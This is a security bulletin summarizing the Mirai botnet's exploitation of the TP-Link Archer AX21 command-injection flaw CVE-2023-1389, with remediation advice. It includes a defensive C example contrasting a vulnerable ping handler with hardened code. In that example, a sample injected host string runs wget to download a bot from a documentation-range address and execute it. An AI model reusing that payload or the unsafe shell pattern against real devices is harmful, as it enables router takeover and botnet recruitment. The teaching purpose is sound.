Hackers Exploit TP-Link N-Day Flaw to Build Mirai Botnet

Cyber Security Threat Summary:
“Researchers from Trend Micro's Zero Day Initiative said telemetry from Eastern Europe indicates that Mirai operators are exploiting a flaw in the TP-Link Archer AX21 firmware. The bug, CVE-2023-1389, allows attackers to inject a command into the router web management interface. A handful of teams competing in the December 2022 Pwn2Own competition in Toronto identified the flaw. TP-Link released a patch in mid-March. The Mirai botnet is a legacy of three Minecraft players who in 2016 unleashed the botnet, which infects internet of things devices running on an ARC processor, as part of an intended protection racket against DDoS attacks. Someone posted the code online, leading cybercriminals to assemble their own Mirai botnets. The original coders pleaded guilty to federal charges in 2017 and cooperated with the FBI. The Zero Day Initiative researchers said infections made with the newfound TP-Link Archer flaw are spreading beyond Eastern Europe into other locations around the globe. Analysis shows this version of Mirai takes pains to imitate legitimate traffic, "making it more difficult to separate DDoS traffic from legitimate network traffic." The speed of adoption of the flaw as a vector for the botnet malware is also notable, the researchers said. "Seeing this CVE being exploited so quickly after the patch being released is a clear demonstration of the decreasing 'time-to-exploit' speed that we continue to see across the industry” (BankInfoSec, 2023).
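The summary above describes CVE-2023-1389 only as a command injection reachable through the router's web management interface. The C example below is added here to illustrate that bug class in general; it is not TP-Link's firmware code, does not reproduce the actual vulnerable parameter or request, and uses a hypothetical "ping a host" diagnostic handler (a common router UI feature) as the carrier. The host values and the 192.0.2.x / 198.51.100.x addresses are constructed sample inputs.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical "ping a host" diagnostic, as found in many router web UIs.
 * The host value arrives straight from an HTTP parameter. */

/* VULNERABLE pattern: the untrusted parameter is spliced into a command line
 * that is later handed to system(), i.e. to /bin/sh -c. Any shell
 * metacharacter in `host` lets the client append its own commands. */
int build_cmd_unsafe(char *out, size_t outlen, const char *host) {
    return snprintf(out, outlen, "ping -c 1 %s", host);
}

/* Returns true when the command line built from `host` carries shell
 * metacharacters, i.e. when system() would execute more than a ping. */
bool unsafe_cmd_has_shell_meta(const char *host) {
    char cmd[512];
    build_cmd_unsafe(cmd, sizeof cmd, host);
    return strpbrk(cmd, ";|&$`<>\n") != NULL;
}

/* HARDENED, step 1: strict allowlist. Hostnames and IPv4 literals only need
 * [A-Za-z0-9.-]; everything else is rejected before any command is formed.
 * A leading '-' is refused too, so the value cannot become a ping option. */
bool valid_host(const char *host) {
    size_t n = strlen(host);
    if (n == 0 || n > 253 || host[0] == '-') return false;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!(isalnum(c) || c == '.' || c == '-')) return false;
    }
    return true;
}

/* HARDENED, step 2: never involve a shell. fork()+execvp() passes `host` as
 * a single argv element, so even a value that slipped past validation could
 * not be parsed into extra commands. Returns ping's exit status, or -1. */
int run_ping_safe(const char *host) {
    if (!valid_host(host)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = {"ping", "-c", "1", (char *)host, NULL};
        execvp("ping", argv);
        _exit(127);            /* only reached if exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Constructed sample inputs: one benign, one carrying an injected command. */
    const char *benign  = "192.0.2.1";
    const char *hostile = "192.0.2.1; wget http://198.51.100.7/bot -O /tmp/bot; sh /tmp/bot";

    char cmd[512];
    build_cmd_unsafe(cmd, sizeof cmd, hostile);
    printf("unsafe command line: %s\n", cmd);
    printf("shell metacharacters present: %s\n",
           unsafe_cmd_has_shell_meta(hostile) ? "yes" : "no");
    printf("valid_host(benign)=%d valid_host(hostile)=%d\n",
           valid_host(benign), valid_host(hostile));
    return 0;
}
```

The two hardening steps are deliberately independent: the allowlist stops the hostile value at the edge, and dropping the shell means a validation bug later on would still not turn a string into executable commands. Mirai-style mass exploitation of routers relies on exactly the first pattern, where one HTTP request carries a payload that downloads and runs the bot.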

Security Officer Comments:
Internet-facing edge devices such as home and small-office routers sit on the boundary between the public internet and the local network, and the Archer AX21 is exactly that kind of device. Criminals target them because a single bug in the management interface yields both a pivot into the internal network and a new node for the botnet. Firewalls and intrusion prevention/detection systems can block attacks of this type, but only when the router's management interface is not itself reachable from the WAN and when exploit and callback traffic actually passes through those controls; a router compromised from the outside sits in front of, not behind, the rest of the perimeter. Botnets assembled this way are monetized through DDoS-for-hire and extortion, and ZDI's observation that this variant mimics legitimate traffic means volumetric signatures alone may not separate attack traffic from real users.

Suggested Corrections:
Organizations running the Archer AX21 should apply the firmware update TP-Link released in mid-March for CVE-2023-1389; given how quickly the flaw was weaponized after the patch, updates for internet-facing devices should be treated as urgent rather than routine. The router's web management interface should not be exposed on the WAN side, and consumer-grade or IoT devices should be segmented from business systems so that a compromised router is not also a foothold on the internal network. Outbound traffic from these devices should be monitored for unexpected connections, since a Mirai node must reach its operators. More broadly, it is important for companies to select hardware vendors carefully in order to protect their business and customers, and to purchase equipment only from reputable brands that offer extensive support and timely security updates for their products.

Link:
https://www.bankinfosecurity.com/hackers-exploit-tp-link-n-day-flaw-to-build-mirai-botnet-a-21866